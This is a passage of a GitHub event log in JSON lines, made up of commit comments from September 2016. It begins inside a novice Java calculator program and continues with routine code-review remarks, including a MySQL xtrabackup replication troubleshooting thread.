 \r\n            result = a+b;\r\n            System.out.println (\"Your answer is\" + \" \" + result); \r\n        }\r\n        //A-B, B-A\r\n             if (choice1 == 2 && choice2 == 2){\r\n                   System.out.println (\" You have selected A and B as your numbers plus subtraction as your operation\");  \r\n                   System.out.println (\"Now select which number you would like to be first?\" + \"\" + \"If you click 1 it will be A-B, click 2 and it will be B-A\");\r\n                   \r\n                   Scanner CheckChoice = new Scanner(System.in);\r\n                   choice3 = CheckChoice.nextInt(); \r\n                  \r\n                   if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform A - B.\");\r\n                    result = a-b;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B-A.\");\r\n                    result = b-a;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                                else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                    }\r\n            }    \r\n       \r\n            \r\n        //A*B. B*A    \r\n        if (choice1 == 3 && choice2 == 3){\r\n            System.out.println (\" You have selected A and B as your numbers plus multiplying as your operation\");  \r\n            result = a * b;\r\n           System.out.println (\"Your answer is\" + \" \" + result);\r\n        }\r\n        //A^B, B^A\r\n            if (choice1 == 4 && choice2 == 4){\r\n                System.out.println (\" You have selected A and B as your numbers plus exponating as your operation\");  \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for A^B, Press 2 for B^A.\");\r\n               \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt(); \r\n                \r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform A^B.\");\r\n                    result = Math.pow (a,b);\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B^A.\");\r\n                    result = Math.pow  (b,a);\r\n                    System.out.println (\"Your answer is\" + \" \" +result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }\r\n            }\r\n        //A/B, B/A             \r\n            if (choice1== 5 && choice2 ==5){\r\n               System.out.println (\" You have selected A and B as your numbers plus devision as your operation\");  \r\n               System.out.println (\" Now you have to select which number will go first. Press 1 for A/B, Press 2 for B/A\");\r\n               \r\n               Scanner CheckChoice = new Scanner(System.in);\r\n               choice3 = CheckChoice.nextInt(); \r\n               \r\n               if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform A/B.\");\r\n                    result = a/b;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B/A.\");\r\n                    result = b/a;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }\r\n            }   \r\n            \r\n        //This will be the end of the A and B combination of operations. (Add,Subtract,Multiplying,Exponating, Devision) \r\n          \r\n        //This will be the beginning of the C and B combination\r\n        \r\n        \r\n        \r\n     \r\n        \r\n        //C+B, B+C\r\n        if (choice1== 6 && choice2 ==6){\r\n            System.out.println (\" You have selected C and B as your numbers plus addition as your operation\");  \r\n            result = c + b;\r\n            System.out.println (\"Your answer is\" + \" \" + result);\r\n        }\r\n        //C-B, B-C\r\n            if (choice1 == 7 && choice2 == 7){\r\n                System.out.println (\" You have selected C and B as your numbers plus subtraction as your operation\"); \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for C-B, Press 2 for B-C.\");\r\n                \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt(); \r\n                \r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform C-B.\");\r\n                    result = c - b;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B-C.\");\r\n                    result = b - c;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }   \r\n            }         \r\n        // C*B, B*C    \r\n        if (choice1 == 8 && choice2 == 8){\r\n            System.out.println (\" You have selected C and B as your numbers plus multiplication as your operation\");  \r\n            result = c * b;\r\n            System.out.println (\"Your answer is\" + \" \" + result);\r\n        }\r\n        //C^B, B^C\r\n            if (choice1 == 9 && choice2 == 9){\r\n                System.out.println (\" You have selected C and B as your numbers plus Exponating as your operation\"); \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for C^B, Press 2 for B^C.\");\r\n                \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt(); \r\n                \r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform C^B.\");\r\n                    result = Math.pow  (c,b);\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B^C.\");\r\n                    result = Math.pow  (b,c);\r\n                    System.out.println (\"Your answer is\" + \" \" + result\r\n                    );\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }   \r\n            }         \r\n        //C/B, B/C\r\n            if (choice1 == 10 && choice2 == 10){\r\n                System.out.println (\" You have selected C and B as your numbers plus Devision as your operation\"); \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for C^B, Press 2 for B^C.\");\r\n                \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt(); \r\n                \r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform C/B.\");\r\n                    result = c / b;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B/C.\");\r\n                    result = b / c;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }   \r\n            }        \r\n    \r\n        //This will be the end of the B and C combination of operations. (Add,Subtract,Multiplying,Exponating, Devision) \r\n          \r\n        \r\n        \r\n        //This will be the beginning of the A and C combination\r\n        \r\n       \r\n        \r\n                if (choice1== 11 && choice2 ==11){\r\n            System.out.println (\" You have selected C and A as your numbers plus addition as your operation\");  \r\n            result = c + a;\r\n            System.out.println (\"Your answer is\" + \" \" + result);\r\n        }\r\n        //C-A, A-C\r\n            if (choice1 == 12 && choice2 == 12){\r\n                System.out.println (\" You have selected C and A as your numbers plus subtraction as your operation\"); \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for C-A, Press 2 for A-C.\");\r\n                \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt();  \r\n                \r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform C-A.\");\r\n                    result = c - a;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform A-C.\");\r\n                    result = a - c;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }   \r\n            }         \r\n        // C*A, A*C    \r\n        if (choice1 == 14 && choice2 == 14){\r\n            System.out.println (\" You have selected C and A as your numbers plus multiplication as your operation\");  \r\n            result = c * a;\r\n            System.out.println (\"Your answer is\" + \" \" + result);\r\n        }\r\n        //C^A, A^C\r\n            if (choice1 == 15 && choice2 == 15){\r\n                System.out.println (\" You have selected C and A as your numbers plus Exponating as your operation\"); \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for C^A, Press 2 for A^C.\");\r\n                \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt(); \r\n                \r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform C^A.\");\r\n                    result = Math.pow  (c,a);\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform B^A.\");\r\n                    result = Math.pow  (a,c);\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }   \r\n            }         \r\n        //C/A, A/C\r\n            if (choice1 == 16 && choice2 == 16){\r\n                System.out.println (\" You have selected C and A as your numbers plus Devision as your operation\"); \r\n                System.out.println (\" Now you have to select which number will go first. Press 1 for C^A, Press 2 for A^C.\");\r\n                \r\n                Scanner CheckChoice = new Scanner(System.in);\r\n                choice3 = CheckChoice.nextInt();\r\n                if (choice3 == 1){\r\n                    System.out.println (\"You have selected to perform C/A.\");\r\n                    result = c / a;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                    else if (choice3 == 2){\r\n                    System.out.println (\"You have selected to perform A/C.\");\r\n                    result = a / c;\r\n                    System.out.println (\"Your answer is\" + \" \" + result);\r\n                }\r\n                        else {\r\n                       System.out.println (\"You have selected an invalid choice. Please choose either 1 or 2.\");\r\n                }   \r\n            }        \r\n        }\r\n    }\r\n\r\n        \r\n   "}},"created_at":"2016-09-06T02:09:05Z"}
{"id":"4518876145","type":"CommitCommentEvent","actor":{"login":"freiheit"},"repo":{"name":"4yn/discord_rss_bot"},"payload":{"comment":{"id":18904867,"position":null,"line":null,"path":null,"commit_id":"a77333be015e53675e95a95d376e530c144d2235","created_at":"2016-09-06T02:09:39Z","updated_at":"2016-09-06T02:09:39Z","body":"I might want to pull this into my version of the code... The main use-case I have for it (excluding a specific list of useless things from a feed that's otherwise very useful) would be covered.\r\n\r\nGoing by the \"title\" probably covers 90% of the use-cases.\r\n\r\nI'd probably call it a \"filter\" instead of a \"regex\"... Maybe \"include_filter\" and \"exclude_filter\" with simple python conditionals instead of the harder to understand negative lookahead things... "}},"created_at":"2016-09-06T02:09:39Z"}
{"id":"4518876786","type":"CommitCommentEvent","actor":{"login":"bcr"},"repo":{"name":"SynchroLabs/SynchroServer"},"payload":{"comment":{"id":18904870,"position":22,"line":606,"path":"SynchroServer/node_modules/synchro-web/client/core/json.js","commit_id":"082a5ba4c1910010986b2f5dca257f14572dc7e8","created_at":"2016-09-06T02:09:56Z","updated_at":"2016-09-06T02:09:56Z","body":"You may not need the special case for `null`:\r\n```\r\n> JSON.stringify(null)\r\n'null'\r\n```"}},"created_at":"2016-09-06T02:09:56Z"}
{"id":"4518880024","type":"CommitCommentEvent","actor":{"login":"slapperwan"},"repo":{"name":"slapperwan/gh4a"},"payload":{"comment":{"id":18904875,"position":null,"line":null,"path":null,"commit_id":"d08b0c07c8d49275d871c3969956f4228ffd36f0","created_at":"2016-09-06T02:11:28Z","updated_at":"2016-09-06T02:11:28Z","body":"@maniac103 Is this feature ready?"}},"created_at":"2016-09-06T02:11:28Z"}
{"id":"4518880960","type":"CommitCommentEvent","actor":{"login":"morenoh149"},"repo":{"name":"rt2zz/react-native-contacts"},"payload":{"comment":{"id":18904877,"position":55,"line":211,"path":"android/src/main/java/com/rt2zz/reactnativecontacts/ContactsProvider.java","commit_id":"86061465ef4e786748270558ce93fd57bf8cc646","created_at":"2016-09-06T02:11:57Z","updated_at":"2016-09-06T02:11:57Z","body":"thanks for the note. If I get a second person to bring this up I'll change it."}},"created_at":"2016-09-06T02:11:57Z"}
{"id":"4518882338","type":"CommitCommentEvent","actor":{"login":"joseph-roque"},"repo":{"name":"joseph-roque/thebrokenquillsociety"},"payload":{"comment":{"id":18904881,"position":null,"line":null,"path":null,"commit_id":"83352051b8ac5ef8913fe52712da82cb4d768a2f","created_at":"2016-09-06T02:12:34Z","updated_at":"2016-09-06T02:12:34Z","body":"Issue #36 "}},"created_at":"2016-09-06T02:12:34Z"}
{"id":"4518882545","type":"CommitCommentEvent","actor":{"login":"joseph-roque"},"repo":{"name":"joseph-roque/thebrokenquillsociety"},"payload":{"comment":{"id":18904882,"position":null,"line":null,"path":null,"commit_id":"56faaba502194257c474f5b2b3bf47a1e6de2e23","created_at":"2016-09-06T02:12:40Z","updated_at":"2016-09-06T02:12:40Z","body":"Issue #36 "}},"created_at":"2016-09-06T02:12:40Z"}
{"id":"4518882702","type":"CommitCommentEvent","actor":{"login":"joseph-roque"},"repo":{"name":"joseph-roque/thebrokenquillsociety"},"payload":{"comment":{"id":18904883,"position":null,"line":null,"path":null,"commit_id":"68b5d021898af0cbc069bc998b42c96c35ada1c2","created_at":"2016-09-06T02:12:44Z","updated_at":"2016-09-06T02:12:44Z","body":"Issue #36 "}},"created_at":"2016-09-06T02:12:44Z"}
{"id":"4518882821","type":"CommitCommentEvent","actor":{"login":"joseph-roque"},"repo":{"name":"joseph-roque/thebrokenquillsociety"},"payload":{"comment":{"id":18904884,"position":null,"line":null,"path":null,"commit_id":"70a67ba60e43c7649c7d4aad83107d925cf29954","created_at":"2016-09-06T02:12:47Z","updated_at":"2016-09-06T02:12:47Z","body":"Issue #36 "}},"created_at":"2016-09-06T02:12:47Z"}
{"id":"4518887331","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":18904898,"position":42,"line":171,"path":"pkg/cmd/server/origin/master_config.go","commit_id":"e8e488f19c50d79d3f1c038df743f70e196fa95c","created_at":"2016-09-06T02:14:57Z","updated_at":"2016-09-06T02:14:57Z","body":"the current approach does expensive stuff at creation time (which only happens once per token) to make sure it can do cheap lookups later (which happens many many times per token)"}},"created_at":"2016-09-06T02:14:57Z"}
{"id":"4518888938","type":"CommitCommentEvent","actor":{"login":"cjjnjust"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18904901,"position":7,"line":87,"path":"common/network-common/pom.xml","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-06T02:15:38Z","updated_at":"2016-09-06T02:15:38Z","body":"commons-codec.version is 1.10, which lead to compile error."}},"created_at":"2016-09-06T02:15:38Z"}
{"id":"4518893053","type":"CommitCommentEvent","actor":{"login":"wuxsoft"},"repo":{"name":"wuxsoft/myblog"},"payload":{"comment":{"id":18904908,"position":8,"line":8,"path":"app/assets/javascripts/articles.coffee","commit_id":"2235cd1a5d0c1b4eefcdeceafc5b762248d44731","created_at":"2016-09-06T02:17:28Z","updated_at":"2016-09-06T02:17:28Z","body":"好的"}},"created_at":"2016-09-06T02:17:28Z"}
{"id":"4518894224","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18904911,"position":5,"line":224,"path":"components/pedigree/resources/src/main/resources/pedigree/model/dynamicGraph.js","commit_id":"f4b075f7a97b1cd9cf969c84726c5e40623b2ac8","created_at":"2016-09-06T02:18:00Z","updated_at":"2016-09-06T02:18:00Z","body":"This change was reverted in one of the later commits"}},"created_at":"2016-09-06T02:18:00Z"}
{"id":"4518897417","type":"CommitCommentEvent","actor":{"login":"12345ieee"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18904918,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T02:19:33Z","updated_at":"2016-09-06T02:19:33Z","body":"I see your point, thanks.\r\n\r\nThe problem I want to solve is that I want the real unicode points for the frontend.\r\nHopefully there is a more elegant hack for now, then I'll want a different `list` output for the backend."}},"created_at":"2016-09-06T02:19:33Z"}
{"id":"4518906062","type":"CommitCommentEvent","actor":{"login":"adymilk"},"repo":{"name":"adymilk/mproxy"},"payload":{"comment":{"id":18904939,"position":null,"line":null,"path":null,"commit_id":"6142a9f2bd2cba88183e5ddd492462e43c6b6b7c","created_at":"2016-09-06T02:23:25Z","updated_at":"2016-09-06T02:23:25Z","body":"great"}},"created_at":"2016-09-06T02:23:25Z"}
{"id":"4518915026","type":"CommitCommentEvent","actor":{"login":"phedlund"},"repo":{"name":"phedlund/SWMessages"},"payload":{"comment":{"id":18904955,"position":null,"line":null,"path":null,"commit_id":"18a7740b0094cef39b22272ba0f84350e02fcc4d","created_at":"2016-09-06T02:27:29Z","updated_at":"2016-09-06T02:27:29Z","body":"Yeah, I know. I have been using TSMessages for a long time. It had certain issues and I want to start preparing for a complete migration to Swift. "}},"created_at":"2016-09-06T02:27:29Z"}
{"id":"4518922626","type":"CommitCommentEvent","actor":{"login":"zhangzaki"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18904969,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T02:30:41Z","updated_at":"2016-09-06T02:30:41Z","body":"Bohu，Thank you for your reply。\r\nMy steps is ：\r\nstep 1：\r\n\tA session，on master running sysbench test，insert the data：\r\n\tsysbench --mysql-host=127.0.0.1 --mysql-port=3314 --mysql-user=test --mysql-password=test \\\r\n\t--mysql-db=test --oltp-tables-count=4 --oltp-table-size=600000 --num-threads=50 --max-requests=10 \\\r\n\t--report-interval=1 --mysql-table-engine=tokudb --test=tests/db/oltp.lua prepare\r\nstep 2：\r\n\tIn A session running period，B session on master running backup，xtrabackup soft is https://github.com/BohuTANG/percona-xtrabackup/tree/feature_support_tokudb_backup.\r\n\tbranch is feature_support_tokudb_backup.\r\n\tbackup command：\r\n\tinnobackupex --defaults-file=/data/mariadb/my3390.cnf --user=test --host=127.0.0.1 --port=3390 --password=test /data/backup\r\nstep 3:\r\n\tB session apply-log:\r\n\tinnobackupex --apply-log /data/backup/xxxxxx\r\nstep 4:\r\n\tSynchronous backup file to slave host：\r\n\tscp -r /data/backup/* slave_host:/data/backup/\r\nstep 5:\r\n\tOn slave copy-back:\r\n\tinnobackupex --defaults-file=/data/mariadb/my3390.cnf --copy-back /data/backup/xxxxxx\r\nstep 6:\r\n\tOn slave host building slave database：\r\n\tchange master to \"xtrabackup_binlog_info\" file location，there will be a 1062 error。\r\n\tchange master to \"xtrabackup_binlog_pos_innodb\" file location，there will be a 1032 error。"}},"created_at":"2016-09-06T02:30:41Z"}
{"id":"4518926348","type":"CommitCommentEvent","actor":{"login":"david-beauchesne"},"repo":{"name":"david-beauchesne/Predict_interactions"},"payload":{"comment":{"id":18904978,"position":null,"line":null,"path":null,"commit_id":"5a05c3a72bf5529050608f313d0198b8ee69da73","created_at":"2016-09-06T02:32:22Z","updated_at":"2016-09-06T02:32:22Z","body":"I tried, but it's twice as long actually. My understanding of this is that the sum and %in% function are closer to the C language, whereas the function intersect is a series of function, which also includes the unique() function that I got rid of:\r\n\r\n```\r\nintersect:\r\nfunction (x, y) \r\n{\r\n    y <- as.vector(y)\r\n    unique(y[match(as.vector(x), y, 0L)])\r\n}\r\n<bytecode: 0x7fdcb3e2e6a8>\r\n<environment: namespace:base>\r\n```\r\n\r\nThe %in% function uses the match() function, which corresponds to the true intersect function as we would want it I think. I checked, and I managed to use the match function on it's own with length() instead of the sum function:\r\n\r\n`        inter <- length(resource_y[match(resource_x, resource_y, nomatch = 0)])\r\n`\r\n\r\nit performs slightly faster than the %in% with sum function"}},"created_at":"2016-09-06T02:32:22Z"}
{"id":"4518929885","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18904988,"position":null,"line":null,"path":null,"commit_id":"09e1fa59727e5963e0e48119bd15908cfeef4cd1","created_at":"2016-09-06T02:34:03Z","updated_at":"2016-09-06T02:34:03Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=29)"}},"created_at":"2016-09-06T02:34:03Z"}
{"id":"4518931187","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":18904990,"position":8,"line":43,"path":"pkg/kubelet/kubelet.go","commit_id":"f277205f4fde9f6a540e196b12d9832569b07d8f","created_at":"2016-09-06T02:34:36Z","updated_at":"2016-09-06T02:34:36Z","body":"Just noticed this but this should be `kubeexternal` or something more appropriate to the package - we don't use mixed case package short names ([a-z0-9] only)."}},"created_at":"2016-09-06T02:34:36Z"}
{"id":"4518934675","type":"CommitCommentEvent","actor":{"login":"laco0416"},"repo":{"name":"laco0416/angular2-component-outlet"},"payload":{"comment":{"id":18904995,"position":null,"line":null,"path":null,"commit_id":"d33e8ee730adfb8f58f339422435dac2e2641490","created_at":"2016-09-06T02:36:14Z","updated_at":"2016-09-06T02:36:14Z","body":"based on #3 and #4"}},"created_at":"2016-09-06T02:36:14Z"}
{"id":"4518939912","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"rollynoel/ev3dev.github.io"},"payload":{"comment":{"id":18905000,"position":null,"line":null,"path":null,"commit_id":"13b719c211ff59f300fd3ab804c7a57250d528b0","created_at":"2016-09-06T02:38:37Z","updated_at":"2016-09-06T02:38:37Z","body":"Hi! I see you made some changes to this page in your fork. If you think they would be useful on the site, please [open a pull request](https://help.github.com/articles/creating-a-pull-request/)."}},"created_at":"2016-09-06T02:38:37Z"}
{"id":"4518940500","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":18905005,"position":null,"line":null,"path":null,"commit_id":"d2cecaa16ac3c5039e0cf9aaaa4dde4131eda7b7","created_at":"2016-09-06T02:38:52Z","updated_at":"2016-09-06T02:38:52Z","body":"Yeah, that's a weird executable in a odd PATH. I dont see arch linux have that."}},"created_at":"2016-09-06T02:38:52Z"}
{"id":"4518942408","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18905008,"position":null,"line":null,"path":null,"commit_id":"124ef5614865a9920c764f8241f97ade100bdf8b","created_at":"2016-09-06T02:39:46Z","updated_at":"2016-09-06T02:39:46Z","body":"@salix5 The game will crash on showing extra, after this update."}},"created_at":"2016-09-06T02:39:46Z"}
{"id":"4518946951","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"Krizthian/android_device_motorola_falcon"},"payload":{"comment":{"id":18905015,"position":null,"line":null,"path":null,"commit_id":"06a7446af2890df5577def314cac70d4e9af7923","created_at":"2016-09-06T02:41:49Z","updated_at":"2016-09-06T02:41:49Z","body":"Not needed anymore"}},"created_at":"2016-09-06T02:41:49Z"}
{"id":"4518949163","type":"CommitCommentEvent","actor":{"login":"jknack"},"repo":{"name":"jooby-project/jooby"},"payload":{"comment":{"id":18905018,"position":13,"line":13,"path":"md/app.md","commit_id":"6bbc0b468dae6afc31f9d19631e26dd5cf8ffb6e","created_at":"2016-09-06T02:42:50Z","updated_at":"2016-09-06T02:42:50Z","body":"👍 will update soon (unless you send a pull request first 😄 )"}},"created_at":"2016-09-06T02:42:50Z"}
{"id":"4518951159","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18905024,"position":328,"line":328,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T02:43:44Z","updated_at":"2016-09-06T02:43:44Z","body":"如果是变量初始化，可以这样写→`var postData = option.data || {};`\r\n强调`option.data === undefined`有什么用意吗?"}},"created_at":"2016-09-06T02:43:44Z"}
{"id":"4518955490","type":"CommitCommentEvent","actor":{"login":"humberos"},"repo":{"name":"sonyxperiadev/device-sony-karin_windy"},"payload":{"comment":{"id":18905032,"position":null,"line":null,"path":null,"commit_id":"fb2c3713c8887ce62c1c019045712ab858555438","created_at":"2016-09-06T02:45:42Z","updated_at":"2016-09-06T02:45:42Z","body":"Thank you @Kali- \r\nhttps://github.com/sonyxperiadev/kernel/pull/853"}},"created_at":"2016-09-06T02:45:42Z"}
{"id":"4518958454","type":"CommitCommentEvent","actor":{"login":"tjlytle"},"repo":{"name":"Nexmo/nexmo-node"},"payload":{"comment":{"id":18905039,"position":16,"line":16,"path":"src/Jwt.js","commit_id":"15ea4953a7fac2dfd57a0b48f72fa54e1354679a","created_at":"2016-09-06T02:47:04Z","updated_at":"2016-09-06T02:47:04Z","body":"For the format, that's where I want to make sure we pick whatever makes sense for the language. Is the `Date` object commonly used for this sort of thing? Or would it be more natural for a developer to use a unix timestamp?\r\n\r\nPerhaps I should add `iat` and `jti` as a `may` in the spec. I think there definitely needs to be an easy way to get the `jti` back, as I think that's what would be used to revoke the token."}},"created_at":"2016-09-06T02:47:04Z"}
{"id":"4518964934","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":18905049,"position":null,"line":null,"path":null,"commit_id":"bbcd0be949a21f28779df5b3c3cb8514ad1ae2f2","created_at":"2016-09-06T02:50:02Z","updated_at":"2016-09-06T02:50:02Z","body":"Was this hack not needed any more?"}},"created_at":"2016-09-06T02:50:02Z"}
{"id":"4518969548","type":"CommitCommentEvent","actor":{"login":"weiqiyjjs"},"repo":{"name":"weiqiyjjs/weiqi"},"payload":{"comment":{"id":18905064,"position":null,"line":null,"path":null,"commit_id":"f45b86aae58da73651d2a0199c3ff31d4a99f4fc","created_at":"2016-09-06T02:52:12Z","updated_at":"2016-09-06T02:52:12Z","body":"主页面和关于我的页面"}},"created_at":"2016-09-06T02:52:12Z"}
{"id":"4518971004","type":"CommitCommentEvent","actor":{"login":"gonetz"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":18905068,"position":null,"line":null,"path":null,"commit_id":"bbcd0be949a21f28779df5b3c3cb8514ad1ae2f2","created_at":"2016-09-06T02:52:51Z","updated_at":"2016-09-06T02:52:51Z","body":"This particular implementation is not needed anymore. The hack is still used."}},"created_at":"2016-09-06T02:52:51Z"}
{"id":"4518972445","type":"CommitCommentEvent","actor":{"login":"kbenne"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18905072,"position":15,"line":125,"path":"openstudiocore/src/openstudio_app/OpenStudioApp.cpp","commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-06T02:53:28Z","updated_at":"2016-09-06T02:53:28Z","body":"Right."}},"created_at":"2016-09-06T02:53:28Z"}
{"id":"4518972482","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":18905073,"position":null,"line":null,"path":null,"commit_id":"bbcd0be949a21f28779df5b3c3cb8514ad1ae2f2","created_at":"2016-09-06T02:53:30Z","updated_at":"2016-09-06T02:53:30Z","body":"Ok"}},"created_at":"2016-09-06T02:53:30Z"}
{"id":"4518974151","type":"CommitCommentEvent","actor":{"login":"DanielWare"},"repo":{"name":"DanielWare/OperationsResearch"},"payload":{"comment":{"id":18905077,"position":null,"line":null,"path":null,"commit_id":"6a3e43c1de6e884504d1ad918f6051e1d8d08494","created_at":"2016-09-06T02:54:17Z","updated_at":"2016-09-06T02:54:17Z","body":"Got answer 96875"}},"created_at":"2016-09-06T02:54:17Z"}
{"id":"4518974720","type":"CommitCommentEvent","actor":{"login":"BohuTANG"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18905079,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T02:54:34Z","updated_at":"2016-09-06T02:54:34Z","body":"Wait.\nWhat's your MySQL version?\nThis works fine with GTID, the older style of replication(file,position)\nnever tested.\n\n\nOn Tue, Sep 6, 2016 at 10:30 AM, zhangzaki <notifications@github.com> wrote:\n\n> Bohu，Thank you for your reply。\n> My steps is ：\n> step 1：\n> A session，on master running sysbench test，insert the data：\n> sysbench --mysql-host=127.0.0.1 --mysql-port=3314 --mysql-user=test\n> --mysql-password=test \\\n> --mysql-db=test --oltp-tables-count=4 --oltp-table-size=600000\n> --num-threads=50 --max-requests=10 \\\n> --report-interval=1 --mysql-table-engine=tokudb --test=tests/db/oltp.lua\n> prepare\n> step 2：\n> In A session running period，B session on master running backup，xtrabackup\n> soft is https://github.com/BohuTANG/percona-xtrabackup/tree/\n> feature_support_tokudb_backup.\n> branch is feature_support_tokudb_backup.\n> backup command：\n> innobackupex --defaults-file=/data/mariadb/my3390.cnf --user=test\n> --host=127.0.0.1 --port=3390 --password=test /data/backup\n> step 3:\n> B session apply-log:\n> innobackupex --apply-log /data/backup/xxxxxx\n> step 4:\n> Synchronous backup file to slave host：\n> scp -r /data/backup/* slave_host:/data/backup/\n> step 5:\n> On slave copy-back:\n> innobackupex --defaults-file=/data/mariadb/my3390.cnf --copy-back\n> /data/backup/xxxxxx\n> step 6:\n> On slave host building slave database：\n> change master to \"xtrabackup_binlog_info\" file location，there will be a\n> 1062 error。\n> change master to \"xtrabackup_binlog_pos_innodb\" file location，there will\n> be a 1032 error。\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/BohuTANG/percona-xtrabackup/commit/b43ba1b25deff2ba21eb9030b49413e1851f263b#commitcomment-18904969>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAKgrOxVKoy5N2d2RsaorZgFhlBgq5b8ks5qnNBRgaJpZM4JxQEk>\n> .\n>\n\n\n\n-- \nBohuTANG\n\n\"The great artist is the simplifier.\"--- *Vincent Van Gogh*\n"}},"created_at":"2016-09-06T02:54:34Z"}
